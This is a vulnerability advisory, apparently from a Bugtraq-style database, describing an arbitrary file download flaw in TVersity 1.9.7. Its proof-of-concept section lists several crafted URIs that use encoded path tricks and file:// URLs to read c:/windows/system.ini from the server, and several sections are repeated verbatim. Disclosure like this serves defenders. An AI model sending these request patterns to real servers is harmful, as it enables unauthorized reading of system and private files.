TVersity Arbitrary File Download Vulnerability
BID:52512
Info
TVersity Arbitrary File Download Vulnerability
| Bugtraq ID: | 52512 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 15 2012 12:00AM |
| Updated: | Mar 15 2012 12:00AM |
| Credit: | Luigi Auriemma |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
TVersity Arbitrary File Download Vulnerability
TVersity is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the webserver process. Information obtained may aid in further attacks.
TVersity 1.9.7 is vulnerable; other versions may also be affected.
TVersity is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the webserver process. Information obtained may aid in further attacks.
TVersity 1.9.7 is vulnerable; other versions may also be affected.
Exploit / POC
TVersity Arbitrary File Download Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com:41952/geturl/.%3ftype%3daudio%252fmpeg%26url%3dfile://c:/windows/&ext=system.ini
http://www.example.com:41952/geturl/%2e?type=audio/mpeg&url=file://c:/windows/&ext=system.ini
http://www.example.com:41952/geturl/%2e?type=audio/mpeg&url=file://c:/windows/system.ini&ext=.
http://www.example.com:41952/geturl/system.ini.ini?type=audio/mpeg&url=file://c:/windows/&ext=.ini
http://www.example.com:41952/geturl/c:\windows\system.ini.mp3?type=audio/mpeg&url=file://&ext=.ini
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com:41952/geturl/.%3ftype%3daudio%252fmpeg%26url%3dfile://c:/windows/&ext=system.ini
http://www.example.com:41952/geturl/%2e?type=audio/mpeg&url=file://c:/windows/&ext=system.ini
http://www.example.com:41952/geturl/%2e?type=audio/mpeg&url=file://c:/windows/system.ini&ext=.
http://www.example.com:41952/geturl/system.ini.ini?type=audio/mpeg&url=file://c:/windows/&ext=.ini
http://www.example.com:41952/geturl/c:\windows\system.ini.mp3?type=audio/mpeg&url=file://&ext=.ini
Solution / Fix
TVersity Arbitrary File Download Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
TVersity Arbitrary File Download Vulnerability
References:
References:
- TVersity <= 1.9.7 Arbitrary File Download (Luigi Auriemma)
- TVersity Homepage (TVersity)